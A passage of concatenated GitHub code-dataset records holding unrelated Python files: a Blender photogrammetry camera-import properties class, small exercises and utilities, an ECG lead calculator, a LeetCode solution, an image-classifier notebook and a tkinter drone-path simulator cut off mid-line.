in or . \"\n + \"The addons uses either (if available) \"\n + \"or as default image path. For MVS reconstruction \"\n + \"results of Colmap, Meshroom or MVE the addon may or may not \"\n + \"search for the images inside the corresponding workspace\",\n # Can not use subtype='DIR_PATH' while importing another file (i.e. nvm)\n default=\"\",\n )\n import_cameras: BoolProperty(\n name=\"Import Cameras\", description=\"Import Cameras\", default=True\n )\n default_width: IntProperty(\n name=\"Default Width\",\n description=\"Width, which will be used used if corresponding \"\n + \"image is not found\",\n default=-1,\n )\n default_height: IntProperty(\n name=\"Default Height\",\n description=\"Height, which will be used used if corresponding \"\n + \"image is not found\",\n default=-1,\n )\n default_focal_length: FloatProperty(\n name=\"Focal length in pixel\",\n description=\"Value for missing focal length in LOG (Open3D) file. \",\n default=float(\"nan\"),\n )\n default_pp_x: FloatProperty(\n name=\"Principal Point X Component\",\n description=\"Principal Point X Component, which will be used if \"\n + \"not contained in the NVM (VisualSfM) / LOG (Open3D) file. If no \"\n + \"value is provided, the principal point is set to the image \"\n + \"center\",\n default=float(\"nan\"),\n )\n default_pp_y: FloatProperty(\n name=\"Principal Point Y Component\",\n description=\"Principal Point Y Component, which will be used if \"\n + \"not contained in the NVM (VisualSfM) / LOG (Open3D) file. If no \"\n + \"value is provided, the principal point is set to the image \"\n + \"center\",\n default=float(\"nan\"),\n )\n add_background_images: BoolProperty(\n name=\"Add a Background Image for each Camera\",\n description=\"The background image is only visible by viewing the \"\n + \"scene from a specific camera\",\n default=True,\n )\n add_image_planes: BoolProperty(\n name=\"Add an Image Plane for each Camera\",\n description=\"Add an Image Plane for each Camera - only for \"\n + \"non-panoramic cameras\",\n default=False,\n )\n add_image_plane_emission: BoolProperty(\n name=\"Add Image Plane Color Emission\",\n description=\"Add image plane color emission to increase the \"\n + \"visibility of the image planes\",\n default=True,\n )\n image_plane_transparency: FloatProperty(\n name=\"Image Plane Transparency Value\",\n description=\"Transparency value of the image planes: \"\n + \"0 = invisible, 1 = opaque\",\n default=0.5,\n min=0,\n max=1,\n )\n add_depth_maps_as_point_cloud: BoolProperty(\n name=\"Add Depth Maps (EXPERIMENTAL)\",\n description=\"Add the depth map (if available) as point cloud \"\n + \"for each Camera\",\n default=False,\n )\n use_default_depth_map_color: BoolProperty(\n name=\"Use Default Depth Map Color\",\n description=\"If not selected, each depth map is colorized with \"\n + \"a different (random) color\",\n default=False,\n )\n depth_map_default_color: FloatVectorProperty(\n name=\"Depth Map Color\",\n description=\"Depth map color\",\n subtype=\"COLOR\",\n size=3, # RGBA colors are not compatible with the GPU Module\n default=(0.0, 1.0, 0.0),\n min=0.0,\n max=1.0,\n )\n depth_map_display_sparsity: IntProperty(\n name=\"Depth Map Display Sparsity\",\n description=\"Adjust the sparsity of the depth maps. A value of 10 \"\n + \"means that every 10th depth map value is converted to a 3D point\",\n default=10,\n min=1,\n )\n depth_map_id_or_name_str: StringProperty(\n name=\"Depth Map IDs or Names to Display\",\n description=\"A list of camera indices or names (separated by \"\n + \"whitespaces) used to select the depth maps, which will be \"\n + \"displayed as point clouds. If no indices are provided, all \"\n + \"depth maps are shown. The names must not contain whitespaces\",\n default=\"\",\n )\n add_camera_motion_as_animation: BoolProperty(\n name=\"Add Camera Motion as Animation\",\n description=\"Add an animation reflecting the camera motion. The \"\n + \"order of the cameras is determined by the corresponding file \"\n + \"name\",\n default=True,\n )\n animation_frame_source: EnumProperty(\n name=\"Use original frames\",\n items=(\n (\"ORIGINAL\", \"Original Frames\", \"\"),\n (\"ADJUSTED\", \"Adjusted Frames\", \"\"),\n ),\n )\n add_animated_camera_background_images: BoolProperty(\n name=\"Add Background Images for the Animated Camera\",\n description=\"The background images are only visible by viewing the \"\n + \"scene from the animated camera at the corresponding time step\",\n default=True,\n )\n number_interpolation_frames: IntProperty(\n name=\"Number of Frames Between two Reconstructed Cameras\",\n description=\"The poses of the animated camera are interpolated\",\n default=0,\n min=0,\n )\n\n interpolation_items = [\n (\"LINEAR\", \"LINEAR\", \"\", 1),\n (\"BEZIER\", \"BEZIER\", \"\", 2),\n (\"SINE\", \"SINE\", \"\", 3),\n (\"QUAD\", \"QUAD\", \"\", 4),\n (\"CUBIC\", \"CUBIC\", \"\", 5),\n (\"QUART\", \"QUART\", \"\", 6),\n (\"QUINT\", \"QUINT\", \"\", 7),\n (\"EXPO\", \"EXPO\", \"\", 8),\n (\"CIRC\", \"CIRC\", \"\", 9),\n (\"BACK\", \"BACK\", \"\", 10),\n (\"BOUNCE\", \"BOUNCE\", \"\", 11),\n (\"ELASTIC\", \"ELASTIC\", \"\", 12),\n (\"CONSTANT\", \"CONSTANT\", \"\", 13),\n ]\n interpolation_type: EnumProperty(\n name=\"Interpolation Type\",\n description=\"Blender string that defines the type of the interpolation\",\n items=interpolation_items,\n )\n\n consider_missing_cameras_during_animation: BoolProperty(\n name=\"Adjust Frame Numbers of Camera Animation\",\n description=\"Assume there are three consecutive images A,B and \"\n + \"C, but only A and C have been reconstructed. This option \"\n + \"adjusts the frame number of C and the number of interpolation \"\n + \"frames between camera A and C\",\n default=True,\n )\n\n remove_rotation_discontinuities: BoolProperty(\n name=\"Remove Rotation Discontinuities\",\n description=\"The addon uses quaternions q to represent the \"\n + \"rotation. A quaternion q and its negative -q describe the same \"\n + \"rotation. This option allows to remove different signs\",\n default=True,\n )\n\n suppress_distortion_warnings: BoolProperty(\n name=\"Suppress Distortion Warnings\",\n description=\"Radial distortion might lead to incorrect alignments \"\n + \"of cameras and points. Enable this option to suppress \"\n + \"corresponding warnings. If possible, consider to re-compute the \"\n + \"reconstruction using a camera model without radial distortion\",\n default=False,\n )\n\n adjust_render_settings: BoolProperty(\n name=\"Adjust Render Settings\",\n description=\"Adjust the render settings according to the \"\n + \"corresponding images - all images have to be captured with the \"\n + \"same device. If disabled the visualization of the camera cone \"\n + \"in 3D view might be incorrect\",\n default=True,\n )\n\n camera_extent: FloatProperty(\n name=\"Initial Camera Extent (in Blender Units)\",\n description=\"Initial Camera Extent (Visualization)\",\n default=1,\n )\n\n def draw_camera_options(\n self,\n layout,\n draw_image_fp=True,\n draw_depth_map_import=False,\n draw_image_size=False,\n draw_principal_point=False,\n draw_focal_length=False,\n draw_everything=False,\n ):\n camera_box = layout.box()\n\n if draw_image_fp or draw_everything:\n camera_box.prop(self, \"image_fp_type\")\n if self.image_fp_type in [\"NAME\", \"RELATIVE\"] or draw_everything:\n camera_box.prop(self, \"image_dp\")\n\n if (\n draw_focal_length\n or draw_image_size\n or draw_principal_point\n or draw_everything\n ):\n image_box = camera_box.box()\n if draw_focal_length or draw_everything:\n image_box.prop(self, \"default_focal_length\")\n if draw_image_size or draw_everything:\n image_box.prop(self, \"default_width\")\n image_box.prop(self, \"default_height\")\n if draw_principal_point or draw_everything:\n image_box.prop(self, \"default_pp_x\")\n image_box.prop(self, \"default_pp_y\")\n\n import_camera_box = camera_box.box()\n import_camera_box.prop(self, \"import_cameras\")\n if self.import_cameras or draw_everything:\n import_camera_box.prop(self, \"camera_extent\")\n import_camera_box.prop(self, \"add_background_images\")\n\n image_plane_box = import_camera_box.box()\n image_plane_box.prop(self, \"add_image_planes\")\n if self.add_image_planes or draw_everything:\n image_plane_box.prop(self, \"add_image_plane_emission\")\n image_plane_box.prop(self, \"image_plane_transparency\")\n\n if draw_depth_map_import or draw_everything:\n depth_map_box = import_camera_box.box()\n depth_map_box.prop(self, \"add_depth_maps_as_point_cloud\")\n if self.add_depth_maps_as_point_cloud or draw_everything:\n depth_map_box.prop(self, \"use_default_depth_map_color\")\n if self.use_default_depth_map_color or draw_everything:\n depth_map_box.prop(self, \"depth_map_default_color\")\n depth_map_box.prop(self, \"depth_map_display_sparsity\")\n depth_map_box.prop(self, \"depth_map_id_or_name_str\")\n\n anim_box = camera_box.box()\n anim_box.prop(self, \"add_camera_motion_as_animation\")\n\n if self.add_camera_motion_as_animation or draw_everything:\n anim_box.row().prop(self, \"animation_frame_source\", expand=True)\n if self.animation_frame_source == \"ORIGINAL\" or draw_everything:\n anim_box.prop(self, \"add_animated_camera_background_images\")\n if self.animation_frame_source == \"ADJUSTED\" or draw_everything:\n anim_box.prop(self, \"number_interpolation_frames\")\n anim_box.prop(self, \"consider_missing_cameras_during_animation\")\n anim_box.prop(self, \"interpolation_type\")\n anim_box.prop(self, \"remove_rotation_discontinuities\")\n\n camera_box.prop(self, \"suppress_distortion_warnings\")\n camera_box.prop(self, \"adjust_render_settings\")\n\n def enhance_camera_with_intrinsics(self, cameras):\n # This function should be overwritten,\n # if the intrinsic parameters are not part of the reconstruction data\n # (e.g. log file)\n success = True\n return cameras, success\n\n def enhance_camera_with_images(self, cameras):\n # This function should be overwritten,\n # if image size is not part of the reconstruction data\n # (e.g. nvm file)\n success = True\n return cameras, success\n\n def import_photogrammetry_cameras(self, cameras, parent_collection):\n if self.import_cameras or self.add_camera_motion_as_animation:\n cameras, success = self.enhance_camera_with_images(cameras)\n if success:\n cameras, success = self.enhance_camera_with_intrinsics(cameras)\n if success:\n # The principal point information may be provided in the reconstruction data\n if not principal_points_initialized(cameras):\n set_principal_point_for_cameras(\n cameras, self.default_pp_x, self.default_pp_y, self\n )\n\n if self.adjust_render_settings:\n adjust_render_settings_if_possible(cameras, op=self)\n\n if self.import_cameras:\n add_cameras(\n cameras,\n parent_collection,\n image_dp=self.image_dp,\n add_background_images=self.add_background_images,\n add_image_planes=self.add_image_planes,\n add_depth_maps_as_point_cloud=self.add_depth_maps_as_point_cloud,\n camera_scale=self.camera_extent,\n image_plane_transparency=self.image_plane_transparency,\n add_image_plane_emission=self.add_image_plane_emission,\n use_default_depth_map_color=self.use_default_depth_map_color,\n depth_map_default_color=self.depth_map_default_color,\n depth_map_display_sparsity=self.depth_map_display_sparsity,\n depth_map_id_or_name_str=self.depth_map_id_or_name_str,\n op=self,\n )\n\n if self.add_camera_motion_as_animation:\n add_camera_animation(\n cameras,\n parent_collection,\n self.animation_frame_source,\n self.add_animated_camera_background_images,\n self.number_interpolation_frames,\n self.interpolation_type,\n self.consider_missing_cameras_during_animation,\n self.remove_rotation_discontinuities,\n self.image_dp,\n self.image_fp_type,\n op=self,\n )\n else:\n return {\"FINISHED\"}\n","repo_name":"rgurve/Blender-Addon-Photogrammetry-Importer","sub_path":"photogrammetry_importer/properties/camera_import_properties.py","file_name":"camera_import_properties.py","file_ext":"py","file_size_in_byte":15199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"10310459553","text":"import requests\nimport json\n\nheaders = {\n \"Content-Type\": \"application/json\"\n}\npayload = {\n \"test\": 1,\n \"active\": True,\n}\n\ntext = requests.post('http://requestbin.fullcontact.com/186d34m1', data=json.dumps(payload), headers=headers, timeout=(2, 10))\nprint(text)","repo_name":"pfortin-urbn/misc-py2","sub_path":"requests-timeout.py","file_name":"requests-timeout.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25088816521","text":"import fcntl\n\n\ndef write_base(name, phone_num):\n with open('PhoneBook.txt', 'at') as base:\n fcntl.lockf(base, fcntl.LOCK_EX)\n base.write('{name:phone_num}')\n fcntl.lockf(base, fcntl.LOCK_UN)\n\n\n################################################################\n\nclass CSV:\n def load(self):\n print('CSV load')\n return {'Bill': '911'}\n\n def save(self, d):\n print('CSV save')\n\n\nclass JSON:\n def load(self):\n print('Json load')\n return {'Bill': '911'}\n\n def save(self, d):\n print('JSON save')\n\n\nCONFIG = {\n 'dumper': 'CSV'\n}\n\nif CONFIG['dumper'] == 'CSV':\n dumper = CSV()\nelif CONFIG['dumper'] == 'JSON':\n dumper = JSON()\n\nphonebook = dumper.load()\n\n# MODEL CODE\n\ndumper.save(phonebook)\n","repo_name":"SerialSata/ITEA-PythonAdvanced","sub_path":"ClassProject/ClassProject.py","file_name":"ClassProject.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16740689286","text":"\n# %%\nprint('Hello World!')\n\n\n# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nt = np.linspace(0, 10, 100)\ny = np.sin(t)\n\nplt.figure()\nplt.plot(t, y)\nplt.show()\n","repo_name":"airnh-courses/welcomelab","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28795168459","text":"\ndef parse(inputs_file, groupping_symbol=\"group\", input_parts=[\"name\", \"path\"]):\n \"\"\"Parses a yayaml file and returns dict of inputs.\"\"\"\n\n inputs_lines = [line.strip() for line in open(inputs_file, \"r\").readlines()]\n inputs_lines = [line for line in inputs_lines if line and not line.startswith(\"#\")]\n cur_group = None\n i = 0\n group_prefix = \"%s:\" % groupping_symbol\n input_prefixes = [\"%s:\" % input_part for input_part in input_parts]\n\n groups = {}\n while i < len(inputs_lines):\n line = inputs_lines[i]\n if line.startswith(group_prefix):\n # Start new group\n cur_group = line[len(group_prefix):]\n i += 1\n elif line.startswith(input_prefixes[0]):\n input = []\n for j, input_prefix in enumerate(input_prefixes):\n part_line = inputs_lines[i + j]\n part = part_line[len(input_prefixes[j]):]\n input.append(part)\n if cur_group not in groups:\n groups[cur_group] = []\n groups[cur_group].append(input)\n i += len(input_prefixes)\n else:\n # Skip empty line\n i += 1\n return groups\n","repo_name":"jmchilton/pyyayaml","sub_path":"pyyayaml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28814165180","text":"# !/usr/bin/env python 3\n# encoding: utf-8\n# utils.py create by zander on 2017/8/16 14:03\nimport uuid\nimport _md5\nimport os\n\n\ndef handle_file_upload(file):\n \"\"\"\n 保存上传文件到服务器\n :param file: 上传文件\n :return: f_name\n \"\"\"\n base_dir = os.path.dirname(os.path.abspath(__name__))\n pic_dir = os.path.join(base_dir, \"static\", \"upload\")\n uid = \"\".join(str(uuid.uuid4()).split(\"-\")[:2])\n\n f_name = \".\".join([uid,file.name.split(\".\")[1]])\n f_path = os.path.join(pic_dir, f_name)\n with open(f_path, \"wb+\") as pic:\n for chunk in file.chunks():\n pic.write(chunk)\n return f_name\n","repo_name":"nbeezander/djsite","sub_path":"mining/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30717673736","text":"# Среди натуральных чисел, которые были введены, найти наибольшее по сумме цифр. Вывести на экран это число и сумму\n# его цифр.\n\n\ndef sum_digit(a):\n result = 0\n if a.isdigit():\n for i in a:\n result += int(i)\n return result\n\n\nif __name__ == '__main__':\n num = 1\n max_sum = 0\n num_max = 0\n while num != '0':\n num = input('Введите натуральное число или ноль для завершения программы:')\n s = sum_digit(num)\n if s >= max_sum:\n max_sum = s\n num_max = num\n if max_sum != 0:\n print(f'Максимальная сумма цифр {max_sum} в числе {num_max}')\n else:\n print('Не введено ни одного натурального числа')\n","repo_name":"RSV48/algorithms","sub_path":"task_02_09.py","file_name":"task_02_09.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30328156355","text":"def fibonacci(n):\n \"\"\"\n\tReturns nth number in fib seq\n \"\"\"\n if n < 0:\n raise ValueError(\"n<0 not valis\")\n elif round(n) != n:\n raise ValueError(\"fractional n not allowed\")\n elif n < 2:\n return n\n else:\n return 1+fibonacci(n-1) + fibonacci(n-2)\n \n \n \n","repo_name":"Kselvon/ContiniousIntegration","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1429037194","text":"\"\"\"\r\nRxBox: Lead Calculator Module\r\nContains methods that computes for lead I and the three augmented leads\r\n\r\nAuthors: Dan Simone M. Cornillez\r\n ------------------------------------------------\r\n Instrumentation, Robotics and Control Laboratory\r\n University of the Philippines - Diliman\r\n ------------------------------------------------\r\n July 2009\r\n\"\"\"\r\n\r\ndef LI(leadII,leadIII):\r\n \"\"\" function that computes for lead I\r\n\r\n Computes the lead I using the following equation:\r\n\r\n leadI = leadII - leadIII\r\n \r\n Parameters\r\n ----------\r\n leadII : list of lead II values\r\n leadIII : list of lead III values\r\n\r\n Returns\r\n -------\r\n leadI : list of lead I values\r\n \"\"\"\r\n\r\n leadI=[]\r\n for i in range(len(leadII)):\r\n \r\n leadI.append((-leadIII[i])+leadII[i])\r\n return leadI\r\n\r\n\r\ndef LVL(leadII,leadIII):\r\n \"\"\" function that computes for augmented lead VL\r\n\r\n Computes the lead aVL using the following equation:\r\n\r\n leadI = 0.5*leadII - leadIII\r\n \r\n Parameters\r\n ----------\r\n leadII : list of lead II values\r\n leadIII : list of lead III values\r\n\r\n Returns\r\n -------\r\n leadaVL : list of lead aVL values\r\n \"\"\"\r\n\r\n leadaVL = []\r\n for i in range(len(leadII)):\r\n leadaVL.append((-leadIII[i])+(0.5*leadII[i]))\r\n return leadaVL \r\n\r\ndef LVF(leadII,leadIII):\r\n \"\"\" function that computes for augmented lead VF\r\n\r\n Computes the lead aVF using the following equation:\r\n\r\n leadaVF = 0.5*(leadII + leadIII)\r\n \r\n Parameters\r\n ----------\r\n leadII : list of lead II values\r\n leadIII : list of lead III values\r\n\r\n Returns\r\n -------\r\n leadaVF : list of lead aVF values\r\n \"\"\"\r\n\r\n leadaVF = []\r\n for i in range(len(leadII)):\r\n leadaVF.append(0.5*(leadIII[i]+leadII[i]))\r\n\r\n return leadaVF\r\n\r\ndef LVR(leadII,leadIII):\r\n \"\"\" function that computes for augmented lead VR\r\n\r\n Computes the lead aVR using the following equation:\r\n\r\n leadaVR = 0.5*(leadIII - leadII)\r\n \r\n Parameters\r\n ----------\r\n leadII : list of lead II values\r\n leadIII : list of lead III values\r\n\r\n Returns\r\n -------\r\n leadaVR : list of lead aVR values\r\n \"\"\"\r\n\r\n leadaVR = []\r\n for i in range(len(leadII)):\r\n leadaVR.append(0.5*(leadIII[i]-leadII[i]))\r\n\r\n return leadaVR\r\n\r\n\r\n","repo_name":"hamalawy/telehealth","sub_path":"lifelink/rxbox/branches/RxBox v0.2/leadcalc.py","file_name":"leadcalc.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72565788354","text":"'''\n\nDescription:\n\nGiven two strings: s1 and s2 with the same size, check if some permutation of string s1 can break some permutation of string s2 or vice-versa (in other words s2 can break s1).\n\nA string x can break string y (both of size n) if x[i] >= y[i] (in alphabetical order) for all i between 0 and n-1.\n\n \n\nExample 1:\n\nInput: s1 = \"abc\", s2 = \"xya\"\nOutput: true\nExplanation: \"ayx\" is a permutation of s2=\"xya\" which can break to string \"abc\" which is a permutation of s1=\"abc\".\n\n\n\nExample 2:\n\nInput: s1 = \"abe\", s2 = \"acd\"\nOutput: false \nExplanation: All permutations for s1=\"abe\" are: \"abe\", \"aeb\", \"bae\", \"bea\", \"eab\" and \"eba\" and all permutation for s2=\"acd\" are: \"acd\", \"adc\", \"cad\", \"cda\", \"dac\" and \"dca\". However, there is not any permutation from s1 which can break some permutation from s2 and vice-versa.\n\n\n\nExample 3:\n\nInput: s1 = \"leetcodee\", s2 = \"interview\"\nOutput: true\n \n\nConstraints:\n\ns1.length == n\ns2.length == n\n1 <= n <= 10^5\nAll strings consist of lowercase English letters.\n\n'''\n\n\n\nfrom string import ascii_lowercase\nfrom collections import Counter \n \nclass Solution:\n def checkIfCanBreak(self, s1: str, s2: str) -> bool:\n\n \n def break_another( dict_s1, dict_s2 ):\n \n s1_score, s2_score = 0, 0\n \n s1_win, s2_win = True, True\n \n for letter in reversed(ascii_lowercase):\n \n # scan from 'z' to 'a', (from strong letter to weak letter)\n \n s1_score += dict_s1[letter]\n s2_score += dict_s2[letter]\n \n # s1 break s2 if s1's score is larger than or equal to s2's score always, and vice versa.\n s1_win &= ( s1_score >= s2_score )\n s2_win &= ( s2_score >= s1_score )\n \n \n return s1_win or s2_win\n \n # --------------------------------------------\n \n ## dictionary\n # key: lowercase alphabet letter\n # value: occurrence\n dict_s1, dict_s2 = map( Counter, [s1, s2] )\n \n return break_another(dict_s1, dict_s2)\n\n\n\n# n : the character length of string\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of dictionary building, which is of O( n )\n\n## Space Complexity: O( n )\n#\n# The overhead in spaceis the storage for dictionary, which is of O( n )\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 's1 s2')\n\ndef test_bench():\n\n test_data = [\n TestEntry(s1 = \"abc\", s2 = \"xya\" ),\n TestEntry(s1 = \"abe\", s2 = \"acd\" ),\n TestEntry(s1 = \"leetcodee\", s2 = \"interview\" ),\n ]\n\n for t in test_data:\n\n print( Solution().checkIfCanBreak( *t ) )\n \n return\n\n\n\nif __name__ == '__main__':\n\n test_bench() ","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1433_Check If a String Can Break Another String/by_letter_score_and_dictionary.py","file_name":"by_letter_score_and_dictionary.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"10969219096","text":"import unittest\nimport numpy as np\n\n# from Differential_Evolution2 import StoppingCriterion\nimport sys\nsys.path.append(r'C:\\Users\\bonnyaigergo\\Documents\\GitHub\\Evolutionary-Algorithms\\Differential_Evolution2')\nimport StoppingCriterion\n\nclass TestImpBestObj(unittest.TestCase):\n \n def setUp(self):\n self.termination = StoppingCriterion.ImpBestObj()\n \n def test_ImpBestObj_case1(self):\n \"\"\"\n Testing outcomes by simulated iterations\n\n Returns\n -------\n True, True\n \"\"\"\n self.termination.from_nth_gen = 0\n self.termination.patience = 3\n fitnesses = np.array([[0, 2, 1],\n [0, 1, 1],\n [0, 0, 1],\n [0, 0, 1]])\n best_idx = 0\n outcome = []\n \n for i in range(len(fitnesses)): \n fitness = fitnesses[i]\n nth_gen = i\n outcome.append(self.termination.MeetCriterion(fitness, best_idx, nth_gen))\n \n self.assertEqual(self.termination.metric_list.tolist(), [0, 0, 0, 0])\n self.assertEqual(outcome, [False, False, True, True])\n \nif __name__ == '__main__':\n unittest.main()\n # Pycharm\n # import coverage\n # coverage run Differential_Evolution2\\unit_test\\testing_StoppingCriterion\\unit_test_MaxDistObj.py\n # coverage run -m unittest Differential_Evolution2\\unit_test\\testing_StoppingCriterion\\unit_test_MaxDistObj.py\n # coverage report\n # coverage report -m\n # coverage html\n # index.html file\n \n # pip install pytest-cov\n","repo_name":"GergoGit/Evolutionary-Algorithms","sub_path":"Metaheuristics2/unit_test/testing_StoppingCriterion/unit_test_ImpBestObj.py","file_name":"unit_test_ImpBestObj.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37856605558","text":"\"\"\"\nJust a quick program that takes the hit_page.html and surrounds it by html\nthat lets you view it directly in a browser\n\"\"\"\n\ndef main():\n with open(\"mturk_hit_page.html\", 'r', encoding='utf-8') as f:\n raw_html = f.read()\n new_html = \"HIT Preview\" + raw_html\n new_html = new_html + \"\"\n output_fpath = \"mturk_hit_preview.html\"\n with open(output_fpath, 'w', encoding='utf-8') as g:\n g.write(new_html)\n print(f\"Preview html written to {output_fpath}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"jpowerj/mturk-twostage","sub_path":"code/gen_hit_preview.py","file_name":"gen_hit_preview.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6598194932","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nfrom ipywidgets import widgets\nimport io\n\n\n# In[2]:\n\n\nidx2label = {\n 0: \"tench\", \n 1: \"English springer\", \n 2: \"cassette player\", \n 3: \"chain saw\", \n 4: \"church\", \n 5: \"French horn\", \n 6: \"garbage truck\",\n 7: \"gas pump\", \n 8: \"golf ball\", \n 9: \"parachute\"\n}\n\n\n# In[3]:\n\n\ndef classify(image, model):\n image = tf.convert_to_tensor(np.array(image)).numpy()\n image = tf.image.resize(image, (160, 160))\n batch = tf.expand_dims(image, 0)\n res = model(batch)\n conf_idx = tf.argmax(tf.sigmoid(res[0]))\n print(f\"It's a: {idx2label[tf.argmax(res[0]).numpy()]} with a confidence of {tf.sigmoid(res[0])[conf_idx] * 100:.3f}%\")\n\n\n# In[4]:\n\n\nfrom ipywidgets import FileUpload\nupload = FileUpload()\nupload\n\n\n# In[5]:\n\n\nmodel = tf.keras.models.load_model(\"best.hdf5\")\n\n\n# In[6]:\n\n\nbutton = widgets.Button(description='Classify!')\nout = widgets.Output()\n\ndef on_button_clicked(_):\n with out:\n with tf.device('/CPU:0'):\n data = upload.data\n image = Image.open(io.BytesIO(data[-1]))\n classify(image, model)\n \nbutton.on_click(on_button_clicked)\nwidgets.VBox([button,out])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Abhiswain97/Tensorflow-projects","sub_path":"Imagenette_classification/Deploy_with_voila.py","file_name":"Deploy_with_voila.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39987300761","text":"from asyncio import constants\r\nfrom atexit import register\r\nfrom cProfile import label\r\nfrom cmath import sqrt, tan\r\nfrom contextlib import nullcontext\r\nfrom xmlrpc.client import boolean\r\nimport numpy as np\r\nfrom numpy import ones,vstack\r\nfrom numpy.linalg import lstsq\r\nfrom shapely.geometry import LineString\r\nimport operator\r\nfrom datetime import datetime\r\nimport tkinter as tk\r\nfrom PIL import ImageTk, Image \r\nimport math\r\n\r\nRANGE_LIMIT = 10\r\n\r\n#(m,c)\r\n\r\n\r\nclass Drone():\r\n id = 0\r\n equation = [(0,4)] #m,c\r\n src = (0.0,0.0)\r\n dst = []\r\n lauched_time = 0.0\r\n last_known_position = (-2.0,4.0)\r\n last_known_speed = 0.0\r\n speed = []\r\n\r\n def __init__(self,id,src,dst) -> None:\r\n self.id = id\r\n self.src = src\r\n self.dst = dst\r\n \r\n #fly x distance in delta time\r\n #speed (vx,vy)\r\n def fly(self,speed,delta):\r\n #update last known position\r\n self.last_known_position = tuple(map(operator.add,self.last_known_position, speed*delta))\r\n self.last_known_speed = speed\r\n\r\nactive_drones = [Drone(0,(-2.0,4.0),[(3.0,4.0)])]\r\n\r\n\r\n\r\n\r\nclass Example(tk.Frame):\r\n cur_pos = 0\r\n src_entry = 0\r\n label_pointer = 0\r\n last_clicked = 0\r\n src = []\r\n registered = []\r\n drone_position = []\r\n drone_label = []\r\n last_speed = []\r\n root = 0\r\n id = 0\r\n new_speed = 0.0\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n self.root = parent\r\n image1 = Image.open(\"./Interview drone.png\")\r\n image1 = image1.resize((1000, 500), Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n \r\n label1 = tk.Label(image=test)\r\n label1.image = test\r\n # Position image\r\n label1.place(x=0, y=0)\r\n label1.bind(\"\", self.callback)\r\n self.label_pointer = label1\r\n entry1 = tk.Entry (name = \"src\") \r\n entry1.place( x= 500, y=550)\r\n self.src_entry = entry1\r\n\r\n button1 = tk.Button(text=\"Submit\",command = self.submit)\r\n button1.place(x=450, y=550)\r\n button2 = tk.Button(text=\"Run\",command = self.run)\r\n button2.place(x=400, y=550)\r\n\r\n def submit(self):\r\n self.last_clicked = 0\r\n if len(self.registered) == self.id:\r\n self.registered.insert(self.id,[self.cur_pos])\r\n else :\r\n self.registered[self.id].append(self.cur_pos)\r\n print(self.registered)\r\n \r\n\r\n def run(self):\r\n self.new_speed = self.calculate_path((self.registered[self.id][0],self.registered[self.id][1]))\r\n if self.calculate_path((self.registered[self.id][0],self.registered[self.id][1])) != 0.01:\r\n print(\"new speed is :\" + str(self.new_speed))\r\n print(\"new speed is \", self.new_speed)\r\n image2 = Image.open(\"./drone.png\")\r\n image2 = image2.resize((10, 10), Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image2)\r\n label1 = tk.Label(image=test)\r\n label1.image = test\r\n # Position image\r\n self.drone_label.append(label1)\r\n label1.place(x=self.registered[self.id][0][0], y=self.registered[self.id][0][1])\r\n self.drone_position.append(self.registered[self.id][0])\r\n self.src.append(self.drone_position[self.id])\r\n _ = self.registered[self.id].pop(0)\r\n self.fly(self.new_speed,self.registered[self.id][0],self.id)\r\n self.id += 1\r\n #self.last_speed.append(new_speed)\r\n #self.src[self.id],self.new_speed,self.registered[self.id][0],self.id\r\n \r\n def fly(self,speed, dst,id):\r\n speed = 0.01\r\n delta = 100\r\n \r\n if(abs(self.drone_position[id][0]-self.registered[id][0][0])<0.5 and abs(self.drone_position[id][1]-self.registered[id][0][1]) <0.5):\r\n if len(self.registered[id]) > 1:\r\n self.registered[id].pop(0)\r\n self.src[id] = self.drone_position[id]\r\n self.after(delta, self.fly,self.src[id],self.registered[id][0],id)\r\n \r\n print(self.drone_position[id])\r\n return\r\n else:\r\n return\r\n\r\n direction_x = 1\r\n direction_y = 1\r\n m = abs((dst[1] - self.drone_position[id][1])/(dst[0]-self.drone_position[id][0]))\r\n vx = math.sqrt(abs(speed**2/(1+m)))\r\n vy = 